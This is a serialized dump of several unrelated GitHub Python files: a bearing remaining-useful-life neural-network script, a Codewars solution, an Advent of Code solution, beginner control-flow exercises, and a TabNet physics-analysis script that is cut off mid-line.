test_RUL1_6\r\nX_test1_6, Y_test1_6 = split_x_y(life_time1_6, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B6: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time1_7 = load_data(learning=False, condition=1, bearing=7, filelength=2259)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time1_7 += test_RUL1_7\r\nX_test1_7, Y_test1_7 = split_x_y(life_time1_7, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B7: Test Dataset Loaded')\r\n\r\n\r\nprint('\\nCondition 2: \\n')\r\n\r\ntime, v_acc, life_time = load_data(learning=True, condition=2, bearing=1, filelength=911)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train2_1, Y_train2_1 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B1: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time = load_data(learning=True, condition=2, bearing=2, filelength=797)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train2_2, Y_train2_2 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B2: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time2_3 = load_data(learning=False, condition=2, bearing=3, filelength=1955)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time2_3 += test_RUL2_3\r\nX_test2_3, Y_test2_3 = split_x_y(life_time2_3, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B3: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time2_4 = load_data(learning=False, condition=2, bearing=4, filelength=751)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time2_4 += test_RUL2_4\r\nX_test2_4, Y_test2_4 = split_x_y(life_time2_4, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B4: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time2_5 = load_data(learning=False, condition=2, bearing=5, filelength=2311)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time2_5 += test_RUL2_5\r\nX_test2_5, Y_test2_5 = split_x_y(life_time2_5, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B5: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time2_6 = load_data(learning=False, condition=2, bearing=6, filelength=701)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time2_6 += test_RUL2_6\r\nX_test2_6, Y_test2_6 = split_x_y(life_time2_6, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B6: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time2_7 = load_data(learning=False, condition=2, bearing=7, filelength=230)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time2_7 += test_RUL2_7\r\nX_test2_7, Y_test2_7 = split_x_y(life_time2_7, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B7: Test Dataset Loaded')\r\n\r\n\r\nprint('\\nCondition 3: \\n')\r\n\r\ntime, v_acc, life_time = load_data(learning=True, condition=3, bearing=1, filelength=515)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train3_1, Y_train3_1 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C3B1: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time = load_data(learning=True, condition=3, bearing=2, filelength=1637)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train3_2, Y_train3_2 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C3B2: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time3_3 = load_data(learning=False, condition=3, bearing=3, filelength=434)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time3_3 += test_RUL3_3\r\nX_test3_3, Y_test3_3 = split_x_y(life_time3_3, time, weibull_RMS, weibull_Kurt)\r\nprint('C3B3: Test Dataset Loaded')\r\n\r\n#-----------------------------------------Feature Scaling-----------------------------------------\r\n\r\nsc_1 = StandardScaler()\r\nX_train1_1 = sc_1.fit_transform(X_train1_1)\r\nX_train1_2 = sc_1.fit_transform(X_train1_2)\r\nX_test1_3 = sc_1.fit_transform(X_test1_3)\r\n#X_test1_4 = sc.transform(X_test1_4)\r\nX_test1_5 = sc_1.fit_transform(X_test1_5)\r\nX_test1_6 = sc_1.fit_transform(X_test1_6)\r\nX_test1_7 = sc_1.fit_transform(X_test1_7)\r\n\r\nsc_2 = StandardScaler()\r\nX_train2_1 = sc_2.fit_transform(X_train2_1)\r\nX_train2_2 = sc_2.fit_transform(X_train2_2)\r\nX_test2_3 = sc_2.fit_transform(X_test2_3)\r\nX_test2_4 = sc_2.fit_transform(X_test2_4)\r\nX_test2_5 = sc_2.fit_transform(X_test2_5)\r\nX_test2_6 = sc_2.fit_transform(X_test2_6)\r\nX_test2_7 = sc_2.fit_transform(X_test2_7)\r\n\r\nsc_3 = StandardScaler()\r\nX_train3_1 = sc_3.fit_transform(X_train3_1)\r\nX_train3_2 = sc_3.fit_transform(X_train3_2)\r\nX_test3_3 = sc_3.fit_transform(X_test3_3)\r\nprint('\\nApplied Feature Scaling\\n')\r\n\r\n#-----------------------------------Training Models-------------------------------------\r\n\r\nregressor_1 = Sequential()\r\nregressor_1.add(Dense(input_dim=6, output_dim=2, activation='sigmoid', init='uniform'))\r\nregressor_1.add(Dense(output_dim=1, activation='relu', init='uniform'))\r\nregressor_1.compile(optimizer='adam', loss='mean_absolute_percentage_error')\r\nregressor_1.fit(X_train1_1, Y_train1_1, batch_size=1000, epochs=40)\r\nprint('C1B1: Model Trained')\r\nregressor_1.fit(X_train1_2, Y_train1_2, batch_size=1000, epochs=40)\r\nprint('C1B2: Model Trained')\r\n\r\n#nn1 = NeuralNet(layers=[6, 2, 1], learning_rate=0.01, iterations=100)\r\n#nn1.fit(X_train1_1, Y_train1_1)\r\n#print('C1B1: Model Trained')\r\n#nn1.fit(X_train1_2, Y_train1_2)\r\n#print('C1B2: Model Trained')\r\n\r\n\r\nregressor_2 = Sequential()\r\nregressor_2.add(Dense(input_dim=6, output_dim=2, activation='sigmoid', init='uniform'))\r\nregressor_2.add(Dense(output_dim=1, activation='relu', init='uniform'))\r\nregressor_2.compile(optimizer='adam', loss='mean_absolute_percentage_error')\r\nregressor_2.fit(X_train2_1, Y_train2_1, batch_size=1000, epochs=40)\r\nprint('C2B1: Model Trained')\r\nregressor_2.fit(X_train2_2, Y_train2_2, batch_size=1000, epochs=40)\r\nprint('C2B2: Model Trained')\r\n\r\n\r\nregressor_3 = Sequential()\r\nregressor_3.add(Dense(input_dim=6, output_dim=2, activation='sigmoid', init='uniform'))\r\nregressor_3.add(Dense(output_dim=1, activation='relu', init='uniform'))\r\nregressor_3.compile(optimizer='adam', loss='mean_absolute_percentage_error')\r\nregressor_3.fit(X_train3_1, Y_train3_1, batch_size=1000, epochs=40)\r\nprint('C3B1: Model Trained')\r\nregressor_3.fit(X_train3_2, Y_train3_2, batch_size=1000, epochs=40)\r\nprint('C3B2: Model Trained')\r\n\r\n#-----------------------------------------Results---------------------------------------------\r\n\r\nprint('\\nCondition 1:')\r\n\r\nY_pred1_3 = regressor_1.predict(X_test1_3)\r\nmean_percent_error = np.mean((abs(Y_pred1_3.flatten() - Y_test1_3) / Y_test1_3) * 100)\r\npredicted_RUL = (1-Y_pred1_3[-1])[0]*life_time1_3\r\nprint('\\nB13 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B13 Actual RUL: ',test_RUL1_3,'s')\r\nprint('Test B13 Mean Error: ',mean_percent_error,'%')\r\n\r\n#Y_pred1_4 = regressor.predict(X_test1_4)\r\n#mean_percent_error = np.mean((abs(Y_pred1_4.flatten() - Y_test1_4) / Y_test1_4) * 100)\r\n#print('Test B14 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred1_5 = regressor_1.predict(X_test1_5)\r\nmean_percent_error = np.mean((abs(Y_pred1_5.flatten() - Y_test1_5) / Y_test1_5) * 100)\r\npredicted_RUL = (1-Y_pred1_5[-1])[0]*life_time1_5\r\nprint('\\nB15 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B15 Actual RUL: ',test_RUL1_5,'s')\r\nprint('Test B15 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred1_6 = regressor_1.predict(X_test1_6)\r\nmean_percent_error = np.mean((abs(Y_pred1_6.flatten() - Y_test1_6) / Y_test1_6) * 100)\r\npredicted_RUL = (1-Y_pred1_6[-1])[0]*life_time1_6\r\nprint('\\nB16 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B16 Actual RUL: ',test_RUL1_6,'s')\r\nprint('Test B16 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred1_7 = regressor_1.predict(X_test1_7)\r\nmean_percent_error = np.mean((abs(Y_pred1_7.flatten() - Y_test1_7) / Y_test1_7) * 100)\r\npredicted_RUL = (1-Y_pred1_7[-1])[0]*life_time1_7\r\nprint('\\nB17 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B17 Actual RUL: ',test_RUL1_7,'s')\r\nprint('Test B17 Mean Error: ',mean_percent_error,'%')\r\n\r\nprint('\\nCondition 2:')\r\n\r\nY_pred2_3 = regressor_2.predict(X_test2_3)\r\nmean_percent_error = np.mean((abs(Y_pred2_3.flatten() - Y_test2_3) / Y_test2_3) * 100)\r\npredicted_RUL = (1-Y_pred2_3[-1])[0]*life_time2_3\r\nprint('\\nB23 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B23 Actual RUL: ',test_RUL2_3,'s')\r\nprint('Test B23 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred2_4 = regressor_2.predict(X_test2_4)\r\nmean_percent_error = np.mean((abs(Y_pred2_4.flatten() - Y_test2_4) / Y_test2_4) * 100)\r\npredicted_RUL = (1-Y_pred2_4[-1])[0]*life_time2_4\r\nprint('\\nB24 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B24 Actual RUL: ',test_RUL2_4,'s')\r\nprint('Test B24 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred2_5 = regressor_2.predict(X_test2_5)\r\nmean_percent_error = np.mean((abs(Y_pred2_5.flatten() - Y_test2_5) / Y_test2_5) * 100)\r\npredicted_RUL = (1-Y_pred2_5[-1])[0]*life_time2_5\r\nprint('\\nB25 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B25 Actual RUL: ',test_RUL2_5,'s')\r\nprint('Test B25 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred2_6 = regressor_2.predict(X_test2_6)\r\nmean_percent_error = np.mean((abs(Y_pred2_6.flatten() - Y_test2_6) / Y_test2_6) * 100)\r\npredicted_RUL = (1-Y_pred2_6[-1])[0]*life_time2_6\r\nprint('\\nB26 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B26 Actual RUL: ',test_RUL2_6,'s')\r\nprint('Test B26 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred2_7 = regressor_2.predict(X_test2_7)\r\nmean_percent_error = np.mean((abs(Y_pred2_7.flatten() - Y_test2_7) / Y_test2_7) * 100)\r\npredicted_RUL = (1-Y_pred2_7[-1])[0]*life_time2_7\r\nprint('\\nB27 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B27 Actual RUL: ',test_RUL2_7,'s')\r\nprint('Test B27 Mean Error: ',mean_percent_error,'%')\r\n\r\nprint('\\nCondition 3:')\r\n\r\nY_pred3_3 = regressor_3.predict(X_test3_3)\r\nmean_percent_error = np.mean((abs(Y_pred3_3.flatten() - Y_test3_3) / Y_test3_3) * 100)\r\npredicted_RUL = (1-Y_pred3_3[-1])[0]*life_time3_3\r\nprint('\\nB33 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B33 Actual RUL: ',test_RUL3_3,'s')\r\nprint('Test B33 Mean Error: ',mean_percent_error,'%\\n')\r\n\r\n#--------------------------------------Plots-------------------------------------------\r\n\r\ntime = [i for i in range(Y_test1_3.shape[0])]\r\nplt.plot(time,Y_test1_3)\r\nplt.plot(time,Y_pred1_3)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing1_3')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test1_5.shape[0])]\r\nplt.plot(time,Y_test1_5)\r\nplt.plot(time,Y_pred1_5)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing1_5')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test1_6.shape[0])]\r\nplt.plot(time,Y_test1_6)\r\nplt.plot(time,Y_pred1_6)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing1_6')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test1_7.shape[0])]\r\nplt.plot(time,Y_test1_7)\r\nplt.plot(time,Y_pred1_7)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing1_7')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test2_3.shape[0])]\r\nplt.plot(time,Y_test2_3)\r\nplt.plot(time,Y_pred2_3)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing2_3')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test2_4.shape[0])]\r\nplt.plot(time,Y_test2_4)\r\nplt.plot(time,Y_pred2_4)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing2_4')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test2_5.shape[0])]\r\nplt.plot(time,Y_test2_5)\r\nplt.plot(time,Y_pred2_5)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing2_5')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test2_6.shape[0])]\r\nplt.plot(time,Y_test2_6)\r\nplt.plot(time,Y_pred2_6)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing2_6')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test2_7.shape[0])]\r\nplt.plot(time,Y_test2_7)\r\nplt.plot(time,Y_pred2_7)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing2_7')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test3_3.shape[0])]\r\nplt.plot(time,Y_test3_3)\r\nplt.plot(time,Y_pred3_3)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing3_3')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\n","repo_name":"Aka-sky/RUL-Prediction","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":25147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35165676652","text":"'''\nMake a program that filters a list of strings and returns a list with only your friends name in it.\n\nIf a name has exactly 4 letters in it, you can be sure that it has to be a friend of yours! Otherwise, you can be sure he's not...\n\nEx: Input = [\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"], Output = [\"Ryan\", \"Yous\"]\n\ni.e.\n\nfriend [\"Ryan\", \"Kieran\", \"Mark\"] `shouldBe` [\"Ryan\", \"Mark\"]\nNote: keep the original order of the names in the output.\nTest.assert_equals(friend([\"Ryan\", \"Kieran\", \"Mark\",]), [\"Ryan\", \"Mark\"])\n'''\n\ntestval = [\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"]\n\ndef friend(in_list):\n out_list = []\n for x in in_list:\n if len(x) == 4:\n out_list.append(x)\n return out_list\n\ndef beter_friend(in_list):\n #after reading the best solution, use list comprehension\n #short https://medium.com/better-programming/list-comprehension-in-python-8895a785550b\n #longer https://realpython.com/list-comprehension-python/\n \n return[x for x in in_list if len(x) == 4]\n\n\nprint(friend(testval))\nprint(friend([\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"]))\nprint(friend([\"1234\", \"12345\", \"2345\", \"4567\"]))\n\nprint(beter_friend(testval))\nprint(beter_friend([\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"]))\nprint(beter_friend([\"1234\", \"12345\", \"2345\", \"4567\"]))\n","repo_name":"willhollingsworth/Study","sub_path":"Codewars/Python/7 kyu/Friend or Foe.py","file_name":"Friend or Foe.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11775943817","text":"import util.DataLoader\n\n\ndef load_data(path_data):\n data = util.DataLoader.DataFile(path_data)\n data.load_basic_list()\n\n results = {}\n idx = 0\n\n for value in data.list:\n results[idx] = value.split('|')\n\n results[idx][0] = results[idx][0].strip().split(\" \")\n results[idx][1] = results[idx][1].strip().split(\" \")\n idx += 1\n\n return results\n\n\ndef process_digits(digit):\n if len(digit) == 2:\n return 1\n if len(digit) == 3:\n return 7\n if len(digit) == 4:\n return 4\n if len(digit) == 7:\n return 8\n\n return None\n\n\ndef process_row(values):\n print (values)\n count_digi = 0\n for value in values:\n\n if process_digits(value) in (1, 4, 7, 8):\n count_digi += 1\n\n return count_digi\n\n\ndef main():\n path_data = \"./2021/Day8/day8.data\"\n data_to_process = load_data(path_data)\n\n count_digi = 0\n for row in data_to_process:\n count_digi = count_digi + process_row (data_to_process[row][1])\n\n print (count_digi)\n\n\nmain()","repo_name":"francastellano/adventofcode","sub_path":"2021/Day8/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37047603343","text":"### 3.1 Conditional operator / Logical operator - Rollercoaster exercise\r\n\r\nprint(\"Welcome to the rollercoaster!\")\r\nheight = int(input(\"What is your height in cm? \"))\r\nbill = 0\r\n\r\nif height >= 120: # Comparisson operators\r\n print(\"You can ride the rollercoaster!\")\r\n age = int(input(\"What is your age?\"))\r\n if age < 12:\r\n bill = 5\r\n print(\"Child tickets are $5.\")\r\n elif age <= 18:\r\n bill = 7\r\n print(\"Youth tickets are $7.\")\r\n else:\r\n bill = 12\r\n print(\"Adult tickets are 12.\")\r\n wants_photo = input(\"Do you want a photo taken? Y or N.\")\r\n \r\n if wants_photo == \"Y\":\r\n bill += 3\r\n # add 3$ to their bill\r\n print(f\"Your final bill is ${bill}\")\r\nelse:\r\n print(\"Sorry, you have to grow taller before you can ride.\")\r\n\r\n### 3.2 Odd or even exercise\r\n\r\nnumber = int(input(\"Which number do you want to choose?\"))\r\nif number % 2 ==0:\r\n print(\"This is an even number.\")\r\nelse:\r\n print(\"This is an odd number.\")\r\n\r\n### 3.3 BMI Calculator 2.0 Exercise\r\n\r\nheight = input(\"enter your height in m: \")\r\nweight = input(\"enter your weight in kg: \")\r\nbmi = float(weight) / float(height) ** 2\r\n\r\nif bmi <18.5:\r\n print(f\"Your BMI is {round(bmi)}, you are underweight.\")\r\nelif bmi <25:\r\n print(f\"Your BMI is {round(bmi)}, you have a normal weight.\")\r\nelif bmi <30:\r\n print(f\"Your BMI is {round(bmi)}, you are slightly overweight.\")\r\nelif bmi <35:\r\n print(f\"Your BMI is {round(bmi)}, you are slightly obese.\")\r\nelse:\r\n print(f\"Your BMI is {round(bmi)}, you are clinically obese.\")\r\n\r\n### 3.4 Leap year exercise\r\n\r\nyear = int(input(\"Which year do you want to check?\"))\r\n\r\nif year % 4 == 0:\r\n if year % 100 == 0:\r\n if year % 400 == 0:\r\n print(\"Leap year.\")\r\n else:\r\n print(\"Not leap year.\")\r\n print(\"Leap year\")\r\nelse:\r\n print(\"Not leap year.\")\r\n\r\n### 3.5 - Pizza order - Exercise\r\n\r\nprint(\"Welcome to Python Pizza Deliveries!\")\r\nsize = input(\"What size pizza do you want? S, M, L\")\r\nadd_pepperoni = input(\"Do you want pepperoni? Y, N\")\r\nextra_cheese = input(\"Do you want extra cheese? Y, N\")\r\n\r\nbill = 0\r\n\r\nif size == \"S\":\r\n bill = 15\r\n if add_pepperoni == \"Y\":\r\n bill += 2\r\n if extra_cheese == \"Y\":\r\n bill += 1\r\nelif size == \"M\":\r\n bill = 20\r\n if add_pepperoni == \"Y\":\r\n bill += 3\r\n if extra_cheese == \"Y\":\r\n bill += 1\r\nelse:\r\n bill = 25\r\n if add_pepperoni == \"Y\":\r\n bill += 3\r\n if extra_cheese == \"Y\":\r\n bill += 1\r\n\r\nprint(f\"Your final bill is: ${bill}.\")\r\n\r\n### 3.6 - Love Calculator - Exercise\r\n\r\nprint(\"Welcome to the Love Calculator!\")\r\nname1 = input(\"What is your name? \\n\")\r\nname2 = input(\"What is their name? \\n\")\r\n\r\ncombined_string = name1 + name2\r\nlower_case_string = combined_string.lower()\r\n\r\nt = lower_case_string.count(\"t\")\r\nr = lower_case_string.count(\"r\")\r\nu = lower_case_string.count(\"u\")\r\ne = lower_case_string.count(\"e\")\r\n\r\ntrue = t + r + u + e\r\n\r\nl = lower_case_string.count(\"l\")\r\no = lower_case_string.count(\"o\")\r\nv = lower_case_string.count(\"v\")\r\ne = lower_case_string.count(\"e\")\r\n\r\nlove = l + o + v + e\r\nlove_score = int(str(true) + str(love))\r\n\r\nif (love_score < 10) or (love_score > 90):\r\n print(f\"Your score is {love_score}, you go together like coke and mentos.\")\r\nelif (love_score >= 40) and (love_score <= 50):\r\n print(f\"Your score is {love_score}, you are alright together.\")\r\nelse:\r\n print(f\"Your score is {love_score}\")\r\n\r\n# Day 3 Project - Treasure island game\r\n\r\nprint(\"Welcome to Treasure Island.\")\r\nprint(\"Your mission is to find the treasure.\")\r\nleft_or_right = input(\"You are at a cross road. Where do you want to go? Type 'left' or 'right' \\n\")\r\nleft_or_right = left_or_right.lower()\r\n\r\nif left_or_right != \"left\":\r\n print(\"You fell into a hole. Game over.\")\r\nelse:\r\n swim_or_wait = input(\"You have come to a lake. There is an island in the middle of it. \"\r\n \"Would you rather swim or wait for a boat? swim / wait \\n\")\r\n swim_or_wait = swim_or_wait.lower()\r\n if swim_or_wait != \"wait\":\r\n print(\"You have been attacked by trout. Game over.\")\r\n else:\r\n door = input(\"Which door do you choose? red / blue / yellow \\n\")\r\n door = door.lower()\r\n if door == \"red\":\r\n print(\"You have been burned by fire. Game over.\")\r\n elif door == \"yellow\":\r\n print(\"You win!\")\r\n elif door == \"blue\":\r\n print(\"You have been eaten by beasts. Game over.\")\r\n else:\r\n print(\"Game over.\")\r\n","repo_name":"KristianAleksiev/100-Days-of-Code-The-Complete-Python-Bootcamp","sub_path":"Day_03/day_3_control_flow_and_logical_operators.py","file_name":"day_3_control_flow_and_logical_operators.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1227547120","text":"import ROOT\nfrom pytorch_tabnet.tab_model import TabNetClassifier\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport sys,os\nsys.path.append(os.environ[\"DIR_PATH\"])\nROOT.EnableImplicitMT(4)\nfrom root_data_loader import load_data\nmodel = TabNetClassifier()\nfolder_path = '/data6/Users/yeonjoon/VcbMVAStudy/TabNet_template/model'\nfiles = os.listdir(folder_path)\n# Filter for files with a .pt.zip extension\npt_zip_files = [f for f in files if f.endswith('.zip')]\n\nmodel.load_model(os.path.join(folder_path,pt_zip_files[0]))\nmodelist = ['45','43','41','23','21']\nvarlist = ['bvsc_w_d','cvsl_w_u','cvsb_w_u','cvsb_w_d','n_bjets','pt_had_t_b','pt_w_d','bvsc_had_t_b','weight']\nvarlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d','cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','pt_w_u','pt_w_d','weight']\nvarlist.extend(['n_jets',\n 'pt_had_t_b','pt_w_u','pt_w_d','pt_lep_t_b',\n 'eta_had_t_b','eta_w_u','eta_w_d','eta_lep_t_b',\n 'bvsc_lep_t_b','bvsc_had_t_b',\n 'm_w_u','m_w_d'])\n\n\n#varlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d','cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight']\n#varlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d','cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight']\n#varlist = ['cvsl_w_u','cvsl_w_d','cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight']\n#varlist.extend(['n_jets',\n # 'pt_had_t_b','pt_w_u','pt_w_d','pt_lep_t_b',\n # 'eta_had_t_b','eta_w_u','eta_w_d','eta_lep_t_b',\n # 'bvsc_lep_t_b','bvsc_had_t_b'])\n######fullinput\nvarlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d','cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight']\nvarlist.extend(['n_jets',\n 'pt_had_t_b','pt_w_u','pt_w_d','pt_lep_t_b',\n 'eta_had_t_b','eta_w_u','eta_w_d','eta_lep_t_b',\n 'bvsc_lep_t_b','bvsc_had_t_b'])\n\n\n \n#KPS modification\nvarlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d',\n 'cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight'\n ,'pt_w_u','pt_w_d','eta_w_u','eta_w_d','best_mva_score']\n# #\n# varlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d',\n# 'cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight'\n# ,'m_had_t','m_had_w','best_mva_score'] \nresult = []\n# outfile = ROOT.TFile(os.path.join(folder_path,'predictions.root'), \"RECREATE\")\n# for mode in modelist:\n# for reco_status in ['Correct','Fail_00','Fail_10','Fail_01','Fail_11']:\n# filter_str = f'decay_mode=={mode}'\n \n# file = '/gv0/Users/yeonjoon/Vcb/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root' if mode =='45' else '/gv0/Users/yeonjoon/Vcb/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_powheg.root'\n# input_tuple=( #first element of tuple = signal tree, second =bkg tree.\n# [('/gv0/Users/yeonjoon/Vcb/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root','POGTightWithTightIso_Central/Result_Tree',f'chk_reco_=={reco_status}&&decay_mode=={mode}')] ##TTLJ_WtoCB Reco 1, (file_path, tree_path, filterstr)\n# ,[] ##TTLJ_WtoCB cs decay\n# )\n# data = load_data(tree_path_filter_str=input_tuple,varlist=varlist,test_ratio=0.1,val_ratio=0.2)\n# arr = data['train_features']\n# weights = data['train_weight']\n# pred = model.predict_proba(arr)[:,1]\n# hist = ROOT.TH1F(f\"pred_{mode}_{reco_status}\", f\"Predictions for Reco_{mode}_{reco_status}\", 40, 0., 1.)\n# for i in range(len(pred)):\n# hist.Fill(pred[i], weights[i])\n# hist.Write() \n# del data\n# del arr\n# del weights\n# del pred\n# outfile.Close()\n# df = pd.concat([pd.DataFrame(a, columns=[modelist[i]]) for i, a in enumerate(result)], axis=1)\n# fig = df.plot.hist(stacked=True, bins=30, figsize=(10, 6), grid=True)\n# fig.figure.savefig('stack.png',dpi=600)\nimport postTrainingToolkit\ninput_tuple=( #first element of tuple = signal tree, second =bkg tree.\n [('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root','POGTightWithTightIso_Central/Result_Tree','chk_reco_correct==1'),\n \n #('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/El/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root','passTightID_Central/Result_Tree','chk_reco_correct==1')\n ], ##TTLJ_WtoCB Reco 1, (file_path, tree_path, filterstr)\n \n [\n ('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root','POGTightWithTightIso_Central/Result_Tree','chk_reco_correct==0'), ##TTLJ_WtoCB Reco 0\n ('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_powheg.root','POGTightWithTightIso_Central/Result_Tree','decay_mode==43'),\n #('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/El/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root','passTightID_Central/Result_Tree','chk_reco_correct==0'), ##TTLJ_WtoCB Reco 0\n #('/data6/Users/isyoon/Vcb_Post_Analysis/Sample/2018/El/RunResult/Central_Syst/Vcb_TTLJ_powheg.root','passTightID_Central/Result_Tree','decay_mode==43')\n ] ##TTLJ_WtoCB cs decay\n \n )\ndata = load_data(tree_path_filter_str=input_tuple,varlist=varlist,test_ratio=0.1,val_ratio=0.2)\narr = data['train_features']\nweights = data['train_weight']\ny=data['train_y']\npred = 